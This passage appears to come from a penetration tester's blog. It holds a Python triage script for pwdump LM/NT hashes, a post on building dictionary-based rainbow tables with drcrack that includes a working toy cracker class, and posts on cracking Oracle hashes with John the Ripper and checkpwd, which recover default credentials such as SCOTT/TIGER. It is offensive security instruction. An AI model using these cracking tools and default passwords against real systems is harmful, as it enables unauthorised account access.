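    if acct["lm"][16:] == EMPTY_LM_HALF:
        return "LM hash present, password is 7 chars or fewer"
    return "LM hash present, password is 8 to 14 chars"


def lm_halves(accounts):
    """Distinct non-empty 8-byte LM halves. Each is an independent DES result over at most
    7 upper-cased characters, so all of them can be attacked as one batch."""
    halves = set()
    for a in accounts:
        for half in (a["lm"][:16], a["lm"][16:]):
            if half != EMPTY_LM_HALF:
                halves.add(half)
    return halves


def reused_nt(accounts):
    """Accounts sharing a non-empty NT hash share a password."""
    by_nt = {}
    for a in accounts:
        if a["nt"] != EMPTY_NT:
            by_nt.setdefault(a["nt"], []).append(a["user"])
    return {nt: users for nt, users in by_nt.items() if len(users) > 1}


def triage(text):
    accounts = parse_pwdump(text)
    return {a["user"]: assess(a) for a in accounts}, lm_halves(accounts), reused_nt(accounts)


if __name__ == "__main__":
    verdicts, halves, reused = triage(HASHDUMP)
    for user, verdict in verdicts.items():
        print(f"{user:18} {verdict}")
    print(f"{len(halves)} LM halves to crack, {len(reused)} reused NT hashes")
```

On the dump above this reports Guest and Sarah as blank, SUPPORT_388945a0 as NT-only, phoenix as seven characters or fewer, the other three as 8 to 14 characters, and seven distinct LM halves to crack.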

Saturday, February 14, 2009

Dictionary Based Rainbow Tables with Dr-crack

After Matt Weir's ShmooCon talk I got motivated to generate and play with some dictionary-based rainbow tables with Dr-crack. Why... I don't know; I pass the hash for everything now, and

"Dictionary based rainbow tables, such as those generated by drcrack, on the other hand allow you to create pre-generated hash tables based on dictionary words and common word mangling rules, such as "P@ssword12".

Plus it's less "magic" when I say I cracked the passwords versus just passing the hash; passing the hash still seems like magic to a lot of people. Plus, as Matt Carpenter pointed out to me, you can't log into Terminal Services/RDP with a hash :-)

So I went to the website, downloaded the .tar, extracted it, typed make all, and got the following error:

cg@notBT:~/evil/drcrack/shmoocon_submit$ make all
make: *** No rule to make target `Public.o', needed by `drtgen'. Stop.

The issue ended up being that the Makefile builds Public.o from Public.cpp, while the file in the tarball is named public.cpp, which make on a case-sensitive filesystem will not find. Rename the file and you should be good to go.

You can run ./dr_rules to alter either the basic_rules file or the keyboard_rules file, but to get started I just used the default keyboard rules, dictionary, and table that they generated.

I changed a password in a VM to a keyboard combo (but still a 10-character password) that I was sure was in the dictionary and dumped the hashes.

Then I ran the tool (usage is documented at http://reusablesec.googlepages.com/drcrack):

cg@notBT:~/evil/drcrack/shmoocon_submit$ ./drcrack -d /home/cg/evil/drcrack/keyboard_basic/keyboard_map.cfg -h 0D757AD173D2FC249CE19364FD64C8EC
keyboard_map.cfg:
Hash=ntlm...
index=0
ChainLen=2400
ChainCount=5000000
RainbowTable=/home/cg/evil/drcrack/keyboard_basic/keyboard_map.rt
Dictionary=/home/cg/evil/drcrack/keyboard_basic/keyboard_dic.txt
ManglingRules=/home/cg/evil/drcrack/keyboard_basic/keyboard.rules
NEWRULES IS TRUE
Processing mangling rules
special=[>!@#$%^&*()_+\-=?.,/\\":; ] size=26
lower=[abcdefghijklmnopqrstuvwxyz] size=26
upper=[ABCDEFGHIJKLMNOPQRSTUVWXYZ] size=26
number=[0123456789] size=10
Reading in the dictionary
Dictionary Size = 658
Calculating rule and index size
Figuring out Rule Size
Index Size for rule 0 is=658
Index Size for rule 1 is=432964
Index Size for rule 2 is=284890312
the total Size=285323934
reading chunk...
83888 bytes read, disk access time: 0.00 s
verifying the file...
searching for 1 hash...
cryptanalysis time: 6.93 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.25 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.38 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.12 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.04 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.14 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.02 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.01 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.06 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.70 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.22 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 0d757ad173d2fc249ce19364fd64c8ec is qwertyuiop
cryptanalysis time: 0.03 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 0.00 s
total cryptanalysis time: 9.40 s
total chain walk step: 2876401
total false alarm: 1451
total chain walk step due to false alarm: 1253346

result
-------------------------------------------------------
0d757ad173d2fc249ce19364fd64c8ec qwertyuiop hex:71776572747975696f70


Overall not bad: in less than 10 seconds I found a password that would otherwise have sat in a pretty big NTLM table. The three "Index Size" lines above are worth a look: 658, 432964 and 284890312 are 658, 658^2 and 658^3, i.e. the keyboard rules concatenate one, two or three entries from the 658-entry dictionary, and the 285,323,934 total is the whole keyspace the table has to cover.
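What makes a table "dictionary based" is only the way keyspace indices are mapped to candidates: instead of enumerating a character set, an index picks a rule and a word (or words) from the dictionary, which is exactly what the per-rule index sizes above are counting. The class below is an added illustration of that idea written for this post, not drcrack's code: the keyspace is "concatenate one, two or three dictionary entries", the hash is MD5 standing in for NTLM (an assumption made so the script runs on stock Python; NTLM is MD4 over UTF-16LE), and chain generation, the position-dependent reduction function, lookup and false-alarm checking are the standard rainbow-table method. Chain length, chain count and the six-word dictionary are toy values chosen for a quick run.

```python
import hashlib
import random


def keyspace_sizes(n_words, max_concat):
    """Keyspace per rule, rule k being 'concatenate k dictionary entries': n, n^2, ... n^k.
    For the 658-entry dictionary above this gives 658, 432964 and 284890312."""
    return [n_words ** k for k in range(1, max_concat + 1)]


class DictRainbow:
    """A dictionary-based rainbow table over word concatenations (toy version)."""

    def __init__(self, words, max_concat=3, chain_len=100, seed=0):
        self.words = list(words)
        self.n = len(self.words)
        self.sizes = keyspace_sizes(self.n, max_concat)
        self.total = sum(self.sizes)        # "the total Size" in drcrack's output
        self.chain_len = chain_len
        self.table = {}                     # endpoint index -> [start indices]
        self.rng = random.Random(seed)
        self.false_alarms = 0               # endpoint matched but regenerated chain did not

    def plaintext(self, index):
        """Map an index in [0, total) to its candidate: one word, two words, three words."""
        for k, size in enumerate(self.sizes, start=1):
            if index < size:
                parts = []
                for _ in range(k):          # base-n digits of the index select the words
                    parts.append(self.words[index % self.n])
                    index //= self.n
                return "".join(reversed(parts))
            index -= size
        raise IndexError("index outside keyspace")

    @staticmethod
    def hash_plaintext(plain):
        # MD5 stands in for NTLM (MD4 over UTF-16LE) so this runs on a stock Python.
        return hashlib.md5(plain.encode()).digest()

    def reduce(self, digest, position):
        """Position-dependent reduction: digest -> keyspace index (the 'rainbow' part)."""
        return (int.from_bytes(digest[:8], "little") + position) % self.total

    def chain(self, start, length=None):
        """Walk a chain; returns (indices at positions 0..length-1, index after the last step)."""
        length = self.chain_len if length is None else length
        idx, visited = start, []
        for pos in range(length):
            visited.append(idx)
            idx = self.reduce(self.hash_plaintext(self.plaintext(idx)), pos)
        return visited, idx

    def build(self, chain_count):
        """Generate chains from random starts; only the (start, end) pairs are stored."""
        for _ in range(chain_count):
            start = self.rng.randrange(self.total)
            _, end = self.chain(start)
            self.table.setdefault(end, []).append(start)

    def crack(self, digest):
        """For every position, finish the chain from there, look the endpoint up, and
        regenerate the matching chain(s) to tell a real hit from a false alarm."""
        for pos in range(self.chain_len - 1, -1, -1):
            idx = self.reduce(digest, pos)
            for later in range(pos + 1, self.chain_len):
                idx = self.reduce(self.hash_plaintext(self.plaintext(idx)), later)
            for start in self.table.get(idx, ()):
                visited, _ = self.chain(start, pos + 1)
                candidate = self.plaintext(visited[pos])
                if self.hash_plaintext(candidate) == digest:
                    return candidate
                self.false_alarms += 1
        return None

    def coverage(self):
        """Fraction of the keyspace some stored chain actually passes through."""
        seen = set()
        for starts in self.table.values():
            for start in starts:
                seen.update(self.chain(start)[0])
        return len(seen) / self.total


if __name__ == "__main__":
    rt = DictRainbow(["qwerty", "uiop", "asdf", "zxcv", "1234", "pass"], max_concat=2, chain_len=20)
    rt.build(60)
    print(f"keyspace {rt.total}, coverage {rt.coverage():.0%}")
    # None if the random chains happened to miss this candidate: coverage is probabilistic.
    print(rt.crack(DictRainbow.hash_plaintext("qwertyuiop")), "false alarms:", rt.false_alarms)
```

Because the dictionary and rules define the keyspace, the table is only as good as that dictionary; the false-alarm count after a lookup is the same statistic drcrack prints above.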

I'm sure more posts are forthcoming...

Sunday, November 23, 2008

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...


Wednesday, November 19, 2008

Oracle Pwnage Part 3

Sorry, no Metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and password. I left a (hint) in the first blog post, but by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second, you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. They probably look something like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from Red-Database-Security: http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5